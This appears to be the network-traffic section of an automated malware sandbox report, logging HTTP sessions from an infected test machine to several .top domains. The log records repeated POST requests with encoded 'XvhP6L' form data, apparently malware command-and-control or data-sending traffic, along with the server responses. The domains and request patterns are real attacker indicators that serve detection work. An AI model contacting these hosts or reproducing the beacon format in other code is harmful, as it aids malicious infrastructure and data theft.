                                                              CF-RAY: 8c1a93273997423b-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              Data Raw: 31 65 39 37 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 6e 64 65 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 6b 69 74 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 69 63 61 62 6c 65 2d 64 65 76 69 63 65 22 63 6f 6e 74 65 6e 74 3d 22 70 63 2c 6d 6f 62 69 6c 65 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 21 20 e5 af b9 e4 b8 8d e8 b5 b7 ef bc 8c e9 a1 b5 e9 9d a2 e6 9c aa [TRUNCATED]
                                                              Data Ascii: 1e97<!doctype html><html><head><meta charset="utf-8"><meta name="renderer" content="webkit"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><meta name="applicable-device"content="pc,mobile"><meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1"><title>404! - </title><link href="http://www.chinaen.org/zb_users/theme/yd1125free/style/css/font-awesome.min.css" rel="stylesheet"><link href="http://www.chinaen.org/zb_users/theme/yd1125free/style/css/swipe
                                                              Sep 11, 2024 22:58:16.140666008 CEST224INData Raw: 72 2d 34 2e 33 2e 33 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68
                                                              Data Ascii: r-4.3.3.min.css" rel="stylesheet"><link rel="stylesheet" type="text/css" href="http://www.chinaen.org/zb_users/theme/yd1125free/style/css/normalize.css" /><link rel="stylesheet" type="text/css" href="http://www.chinaen.o
                                                              Sep 11, 2024 22:58:16.140691996 CEST1236INData Raw: 72 67 2f 7a 62 5f 75 73 65 72 73 2f 74 68 65 6d 65 2f 79 64 31 31 32 35 66 72 65 65 2f 73 74 79 6c 65 2f 73 74 79 6c 65 2e 6d 69 6e 2e 63 73 73 3f 76 3d 31 2e 32 2e 34 22 20 2f 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f
                                                              Data Ascii: rg/zb_users/theme/yd1125free/style/style.min.css?v=1.2.4" /><script src="http://www.chinaen.org/zb_system/script/jquery-2.2.4.min.js" type="text/javascript"></script><script src="http://www.chinaen.org/zb_system/script/zblogphp.js" type="t
                                                              Sep 11, 2024 22:58:16.140728951 CEST1236INData Raw: 63 68 69 6e 61 65 6e 2e 6f 72 67 2f 73 65 61 72 63 68 2e 70 68 70 3f 61 63 74 3d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 71 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22
                                                              Data Ascii: chinaen.org/search.php?act=search"><input type="text" name="q" placeholder=""/><button type="submit" class="submit" value=""><i class="fa fa-search"></i></button></form></div><div class="mnav"><i c
                                                              Sep 11, 2024 22:58:16.140744925 CEST1236INData Raw: 09 09 09 09 09 09 3c 6c 69 3e 0d 0a 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 68 69 6e 61 65 6e 2e 6f 72 67 2f 6c 6f 6c 2f 32 30 34 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 74 69 74
                                                              Data Ascii: <li><a href="http://www.chinaen.org/lol/204.html" target="_blank" title="[]3.3? ">[]3.3? </a><span>2
                                                              Sep 11, 2024 22:58:16.140760899 CEST1236INData Raw: 3e 33 e5 91 a8 e5 89 8d 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 64 61 74 65 74 69 6d 65 22 3e 20 28 30 38 2d 32 35 29 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 6c 69 3e 09 09 09 09 3c 6c 69 3e 0d 0a 09 09 09 09 09 3c 61 20
                                                              Data Ascii: >3<span class="datetime"> (08-25)</span></span></li><li><a href="http://www.chinaen.org/lol/199.html" target="_blank" title="[JR]KSGAG ">[J
                                                              Sep 11, 2024 22:58:16.140867949 CEST1236INData Raw: 63 6c 61 73 73 3d 22 64 61 74 65 74 69 6d 65 22 3e 20 28 30 38 2d 32 34 29 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 6c 69 3e 09 09 09 09 3c 6c 69 3e 0d 0a 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77
                                                              Data Ascii: class="datetime"> (08-24)</span></span></li><li><a href="http://www.chinaen.org/lol/195.html" target="_blank" title=" ">
                                                              Sep 11, 2024 22:58:16.140883923 CEST552INData Raw: 75 73 74 6f 6d 2e 6a 73 3f 76 3d 31 2e 32 2e 34 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79
                                                              Data Ascii: ustom.js?v=1.2.4" type="text/javascript"></script><script>jQuery(document).ready(function($) {jQuery('.main_left').theiaStickySidebar({ additionalMarginTop: 10,});});</script><script>$.ias({ thresholdMargin: -100, triggerPageThreshold:
                                                              Sep 11, 2024 22:58:16.140963078 CEST319INData Raw: 72 3a 20 27 e6 9f a5 e7 9c 8b e6 9b b4 e5 a4 9a 27 2c 20 2f 2f e5 81 9c e6 ad a2 e8 bd bd e5 85 a5 e5 90 8e e6 98 be e7 a4 ba e7 9a 84 e5 86 85 e5 ae b9 20 2e 69 61 73 5f 74 72 69 67 67 65 72 20 e3 80 81 20 2e 69 61 73 5f 74 72 69 67 67 65 72 20
                                                              Data Ascii: r: '', // .ias_trigger .ias_trigger a onPageChange: function (pageNum, pageUrl, scrollOffset) { window._gaq && window._gaq.push(['_trackPageview', jQuery('<a/>').attr('href', pageUrl)[0].pa


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              57192.168.2.759718154.23.184.21880
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:58:24.854794025 CEST437OUTGET /3ozz/?Xt7D=9p4tP8lp52ndpXM&XvhP6L=XDfkmZV0UpreXJRL4a+kMc+s40ElyBknavgDq4xpV4itK9/GJYtr4NsiaYcm7ir36wtKh4I9XU6sRfj+cMnrz2p6V2IZ5AA5gzUpK7TVcpLZf4ygGQ5VljQGU5XXJlbNz7qQtdD+VX81 HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Host: www.57ddu.top
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:58:25.784841061 CEST312INHTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Wed, 11 Sep 2024 20:58:25 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 148
                                                              Connection: close
                                                              ETag: "66a4adce-94"
                                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              58192.168.2.759719152.53.38.080
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:58:30.819317102 CEST684OUTPOST /7f48/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.nuv3.top
                                                              Origin: http://www.nuv3.top
                                                              Cache-Control: max-age=0
                                                              Content-Length: 219
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.nuv3.top/7f48/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 56 39 39 64 45 67 32 48 5a 6f 63 47 38 56 6b 44 6d 43 4d 39 79 77 63 47 45 61 64 79 59 4f 47 44 4b 77 6a 43 74 46 4f 6c 6c 4a 4b 4c 30 7a 4c 46 4e 2b 77 76 35 73 37 75 45 31 32 62 44 73 6e 73 75 75 77 32 46 61 57 53 6e 75 6e 35 6f 39 53 77 74 64 38 59 67 6e 5a 34 55 6f 6b 6b 67 68 33 46 33 43 5a 61 6a 41 4c 37 79 55 44 45 31 58 62 34 6e 64 48 30 30 78 67 57 75 51 66 59 2f 67 6d 72 76 79 4f 31 52 45 35 57 75 5a 32 54 6f 44 36 59 49 32 4b 6b 7a 39 79 72 41 64 59 75 51 2b 48 57 4f 7a 6f 4c 32 6f 74 35 2b 71 4b 65 79 4f 53 63 46 6f 4c 2f 33 71 74 68 78 50 64 63 7a 33 46 58 31 6d 51 74 41 33 64 6d 6c 43 37 41 69 63 6f 34 78 41 3d 3d
                                                              Data Ascii: XvhP6L=V99dEg2HZocG8VkDmCM9ywcGEadyYOGDKwjCtFOllJKL0zLFN+wv5s7uE12bDsnsuuw2FaWSnun5o9Swtd8YgnZ4Uokkgh3F3CZajAL7yUDE1Xb4ndH00xgWuQfY/gmrvyO1RE5WuZ2ToD6YI2Kkz9yrAdYuQ+HWOzoL2ot5+qKeyOScFoL/3qthxPdcz3FX1mQtA3dmlC7Aico4xA==
                                                              Sep 11, 2024 22:58:31.294392109 CEST279INHTTP/1.1 404 Not Found
                                                              content-type: text/html
                                                              cache-control: private, no-cache, max-age=0
                                                              pragma: no-cache
                                                              date: Wed, 11 Sep 2024 20:58:31 GMT
                                                              server: LiteSpeed
                                                              content-encoding: gzip
                                                              vary: Accept-Encoding
                                                              transfer-encoding: chunked
                                                              connection: close
                                                              Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a
                                                              Data Ascii: a
                                                              Sep 11, 2024 22:58:31.294471025 CEST713INData Raw: 32 62 64 0d 0a 65 54 6b 6b db 30 14 fd 5e d8 7f b8 4d 19 b4 10 27 76 ea b0 61 3b 66 63 0f 36 18 5b a1 85 b1 8f b2 75 1d 89 ca 92 27 29 af 95 fe f7 5d d9 49 9a b6 16 d8 92 7c 75 74 ee 39 57 2a ce 3f ff fa 74 f7 e7 e6 0b 08 df aa f2 ac 08 1f 70 7e
                                                              Data Ascii: 2bdeTkk0^M'va;fc6[u')]I|ut9W*?tp~p1(gI_8}Z4k)`-qGPQh#kYc `18at/8WY1RE.\v.2pqf*w6@!Edt,CH4


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              59192.168.2.759720152.53.38.080
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:58:33.371570110 CEST704OUTPOST /7f48/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.nuv3.top
                                                              Origin: http://www.nuv3.top
                                                              Cache-Control: max-age=0
                                                              Content-Length: 239
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.nuv3.top/7f48/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 56 39 39 64 45 67 32 48 5a 6f 63 47 75 6c 30 44 6b 6a 4d 39 6c 67 63 46 49 36 64 79 53 75 47 50 4b 77 66 43 74 48 69 50 6c 62 75 4c 30 57 76 46 43 62 45 76 36 73 37 75 4d 56 33 54 48 73 6e 33 75 75 74 44 46 62 71 53 6e 75 7a 35 6f 38 69 77 73 75 56 4f 69 33 5a 6d 63 49 6b 6d 2f 78 33 46 33 43 5a 61 6a 41 65 57 79 55 62 45 70 33 4c 34 6d 2f 2f 7a 6f 68 67 56 70 51 66 59 31 41 6e 69 76 79 4f 48 52 41 5a 38 75 62 4f 54 6f 43 4b 59 49 48 4b 6e 34 39 79 74 45 64 5a 6d 52 72 7a 54 42 52 4d 48 7a 75 64 43 77 64 53 2f 7a 34 50 2b 66 4b 48 54 70 37 56 61 31 4e 35 71 6b 52 59 69 33 6e 55 31 4e 56 70 48 36 31 65 71 76 4f 4a 38 6e 34 66 56 70 64 70 57 54 38 33 55 65 64 77 76 54 45 38 69 45 57 4d 3d
                                                              Data Ascii: XvhP6L=V99dEg2HZocGul0DkjM9lgcFI6dySuGPKwfCtHiPlbuL0WvFCbEv6s7uMV3THsn3uutDFbqSnuz5o8iwsuVOi3ZmcIkm/x3F3CZajAeWyUbEp3L4m//zohgVpQfY1AnivyOHRAZ8ubOToCKYIHKn49ytEdZmRrzTBRMHzudCwdS/z4P+fKHTp7Va1N5qkRYi3nU1NVpH61eqvOJ8n4fVpdpWT83UedwvTE8iEWM=
                                                              Sep 11, 2024 22:58:33.815606117 CEST279INHTTP/1.1 404 Not Found
                                                              content-type: text/html
                                                              cache-control: private, no-cache, max-age=0
                                                              pragma: no-cache
                                                              date: Wed, 11 Sep 2024 20:58:33 GMT
                                                              server: LiteSpeed
                                                              content-encoding: gzip
                                                              vary: Accept-Encoding
                                                              transfer-encoding: chunked
                                                              connection: close
                                                              Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a
                                                              Data Ascii: a
                                                              Sep 11, 2024 22:58:33.815907001 CEST713INData Raw: 32 62 64 0d 0a 65 54 6b 6b db 30 14 fd 5e d8 7f b8 4d 19 b4 10 27 76 ea b0 61 3b 66 63 0f 36 18 5b a1 85 b1 8f b2 75 1d 89 ca 92 27 29 af 95 fe f7 5d d9 49 9a b6 16 d8 92 7c 75 74 ee 39 57 2a ce 3f ff fa 74 f7 e7 e6 0b 08 df aa f2 ac 08 1f 70 7e
                                                              Data Ascii: 2bdeTkk0^M'va;fc6[u')]I|ut9W*?tp~p1(gI_8}Z4k)`-qGPQh#kYc `18at/8WY1RE.\v.2pqf*w6@!Edt,CH4


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              60192.168.2.759721152.53.38.080
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:58:35.914391994 CEST1717OUTPOST /7f48/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.nuv3.top
                                                              Origin: http://www.nuv3.top
                                                              Cache-Control: max-age=0
                                                              Content-Length: 1251
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.nuv3.top/7f48/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 56 39 39 64 45 67 32 48 5a 6f 63 47 75 6c 30 44 6b 6a 4d 39 6c 67 63 46 49 36 64 79 53 75 47 50 4b 77 66 43 74 48 69 50 6c 62 6d 4c 30 67 6a 46 44 38 6f 76 31 4d 37 75 47 31 33 53 48 73 6d 6c 75 75 6c 48 46 62 6e 76 6e 73 4c 35 75 61 32 77 72 66 56 4f 6f 33 5a 6d 65 49 6b 6e 67 68 33 51 33 43 49 54 6a 41 4f 57 79 55 62 45 70 79 50 34 77 64 48 7a 37 52 67 57 75 51 66 75 2f 67 6d 4c 76 79 58 79 52 41 64 47 75 4b 75 54 72 69 61 59 62 46 69 6e 78 39 79 76 4a 39 59 67 52 72 32 44 42 52 52 30 7a 71 55 6e 77 61 32 2f 7a 39 69 45 59 75 66 66 71 34 46 7a 32 39 78 4e 78 44 45 32 39 42 49 52 41 56 70 6f 34 58 75 53 33 75 78 77 72 50 6d 31 34 73 35 6a 65 38 58 73 53 4c 74 6c 41 30 4a 6f 65 6d 4d 35 39 30 4a 46 64 6d 75 61 46 59 64 48 65 6e 58 57 65 67 41 30 64 6d 72 2f 37 33 55 59 4b 45 34 6e 62 77 6a 45 72 45 75 62 55 62 2b 6f 45 38 49 47 61 65 37 68 58 30 47 67 38 73 58 39 4e 72 39 59 33 64 75 31 7a 79 49 39 62 51 65 7a 53 6c 38 63 35 67 78 51 66 48 76 6f 57 36 79 33 68 66 41 4b 6d 5a 32 [TRUNCATED]
                                                              Data Ascii: XvhP6L=V99dEg2HZocGul0DkjM9lgcFI6dySuGPKwfCtHiPlbmL0gjFD8ov1M7uG13SHsmluulHFbnvnsL5ua2wrfVOo3ZmeIkngh3Q3CITjAOWyUbEpyP4wdHz7RgWuQfu/gmLvyXyRAdGuKuTriaYbFinx9yvJ9YgRr2DBRR0zqUnwa2/z9iEYuffq4Fz29xNxDE29BIRAVpo4XuS3uxwrPm14s5je8XsSLtlA0JoemM590JFdmuaFYdHenXWegA0dmr/73UYKE4nbwjErEubUb+oE8IGae7hX0Gg8sX9Nr9Y3du1zyI9bQezSl8c5gxQfHvoW6y3hfAKmZ276LbepbRKlpTZgta0igPfM4F3kNAhnNyzmngFwfjgdt0vHGIrXe2OL/bml3YyOWZubkcWOBmdkJmzbH+y52Uh82WP5WDS4Xt8G3NM3DoFnY/OcJ3idw7sNFC3PBC8WUeu6PFI+s8UBDE3BegB6+4VowtTlkgvGJe8BNjAKx9st09NhA+O/Und9OLNE3rleQOiYk5VW4LLtU4rD/H1hn1wAMJQnveFpDVozbs+Eq23WX/dTld4h63M1UdZuggskimkqlrr4fChiflAX+nLkgpNhqWx4voKEYb2xhNdHW3uPuQUblIHbJ864GdjDD+pA/93Gk+l7Sa10LhNEX5b9/nI2V2S2+wIKzL4wq03DaO1Z7kPoMqmGdX3v1xh5A5p86LScu18VQDwf8uZAxNNwLyKx34CogESKU51A+oGD96Do7yyTGr7YTzmkpmaverZHB/IcS1y5G7R5aXcqgiiTONfV+t5XRVg2Bg7jd1grASJV/NgrgmYkiJRq9nd0RQDvQtmd8PgPq+m5IRfnI2i5OZ71XiRYSm3jLjQo7LdmMwKHHDCoDPcJtHMrS19GdQvcPe3nK/aw2QYUb0tpl/TUyrDcUnNavhVwxEOUGRyU+tfPgL+Rezsy2AsFkaHY6xLiyQBzJGwuCXsCkGtBoNbcazz9JiFR2T3LgEP4 [TRUNCATED]
                                                              Sep 11, 2024 22:58:36.357664108 CEST279INHTTP/1.1 404 Not Found
                                                              content-type: text/html
                                                              cache-control: private, no-cache, max-age=0
                                                              pragma: no-cache
                                                              date: Wed, 11 Sep 2024 20:58:36 GMT
                                                              server: LiteSpeed
                                                              content-encoding: gzip
                                                              vary: Accept-Encoding
                                                              transfer-encoding: chunked
                                                              connection: close
                                                              Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a
                                                              Data Ascii: a
                                                              Sep 11, 2024 22:58:36.358491898 CEST713INData Raw: 32 62 64 0d 0a 65 54 6b 6b db 30 14 fd 5e d8 7f b8 4d 19 b4 10 27 76 ea b0 61 3b 66 63 0f 36 18 5b a1 85 b1 8f b2 75 1d 89 ca 92 27 29 af 95 fe f7 5d d9 49 9a b6 16 d8 92 7c 75 74 ee 39 57 2a ce 3f ff fa 74 f7 e7 e6 0b 08 df aa f2 ac 08 1f 70 7e
                                                              Data Ascii: 2bdeTkk0^M'va;fc6[u')]I|ut9W*?tp~p1(gI_8}Z4k)`-qGPQh#kYc `18at/8WY1RE.\v.2pqf*w6@!Edt,CH4


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              61192.168.2.759722152.53.38.080
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:58:38.457194090 CEST436OUTGET /7f48/?XvhP6L=Y/V9HWeQI6V9wDpav31Zmzk5MY4+Ou2xQiPhqUb5lc+p8ROSXtAF44jgGkfnSdbIjMV3KY+ys+uzmsyZr9wUrSReS7kDqE3Vwy5Stw7V8E2w1yWugNHB1ko6qS7b9UC1jiexBCRL4rzt&Xt7D=9p4tP8lp52ndpXM HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Host: www.nuv3.top
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:58:38.909491062 CEST1236INHTTP/1.1 404 Not Found
                                                              content-type: text/html
                                                              cache-control: private, no-cache, max-age=0
                                                              pragma: no-cache
                                                              content-length: 1249
                                                              date: Wed, 11 Sep 2024 20:58:38 GMT
                                                              server: LiteSpeed
                                                              connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, [TRUNCATED]
                                                              Sep 11, 2024 22:58:38.909596920 CEST224INData Raw: 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c
                                                              Data Ascii: 3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              62192.168.2.75972323.225.34.7580
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:58:43.944741964 CEST690OUTPOST /u0n6/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.bashei.top
                                                              Origin: http://www.bashei.top
                                                              Cache-Control: max-age=0
                                                              Content-Length: 219
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.bashei.top/u0n6/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 65 6c 2f 76 4b 6d 35 42 4d 77 4b 74 65 39 48 7a 78 62 30 76 65 4c 7a 54 4c 4f 63 38 32 62 47 72 54 54 71 72 7a 46 41 65 4b 6e 6d 37 44 41 54 44 78 58 46 55 74 52 42 42 37 76 6d 67 6a 4a 6a 4a 51 64 54 59 37 78 39 6a 4c 34 79 44 6e 63 65 73 59 4d 63 53 45 62 4e 79 36 4f 4e 71 47 33 73 73 42 45 52 62 70 4b 72 37 50 6f 4b 4d 50 37 75 79 64 71 65 58 6f 66 53 64 52 31 36 36 35 31 76 52 59 6e 63 68 4c 64 45 58 2f 66 45 4e 72 41 42 59 61 61 49 6d 34 4c 4d 4a 63 63 77 6d 43 4a 63 6c 33 67 6d 62 38 35 37 34 6e 73 61 6c 36 30 4f 42 4d 2b 6f 74 76 41 6b 4c 62 41 33 30 4b 5a 77 72 58 2f 64 6d 6a 4a 55 78 74 43 72 71 6b 42 34 4d 2b 41 3d 3d
                                                              Data Ascii: XvhP6L=el/vKm5BMwKte9Hzxb0veLzTLOc82bGrTTqrzFAeKnm7DATDxXFUtRBB7vmgjJjJQdTY7x9jL4yDncesYMcSEbNy6ONqG3ssBERbpKr7PoKMP7uydqeXofSdR16651vRYnchLdEX/fENrABYaaIm4LMJccwmCJcl3gmb8574nsal60OBM+otvAkLbA30KZwrX/dmjJUxtCrqkB4M+A==
                                                              Sep 11, 2024 22:58:44.526738882 CEST707INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Wed, 11 Sep 2024 20:58:44 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              Content-Encoding: gzip
